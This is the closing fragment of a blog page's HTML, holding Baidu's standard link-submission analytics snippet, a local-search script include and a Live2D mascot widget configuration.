      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>
